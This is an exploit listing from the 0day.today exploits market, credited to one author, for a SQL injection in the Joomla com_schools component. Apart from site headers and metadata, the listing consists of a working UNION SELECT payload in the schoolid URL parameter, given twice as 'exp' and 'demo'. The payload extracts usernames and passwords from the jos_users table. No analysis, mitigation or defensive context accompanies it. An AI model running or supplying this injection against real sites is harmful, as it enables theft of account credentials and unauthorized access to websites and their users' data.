[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_schools SQL injection

Author
Mr.tro0oqy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10376
Category
web applications
Date add
24-12-2009
Platform
unsorted
==========================================
Joomla Component com_schools SQL injection
==========================================

exp:
http://server/path/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
 
 
 
 
 
 
demo :
 
 
http://server/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--



#  0day.today [2024-06-16]  #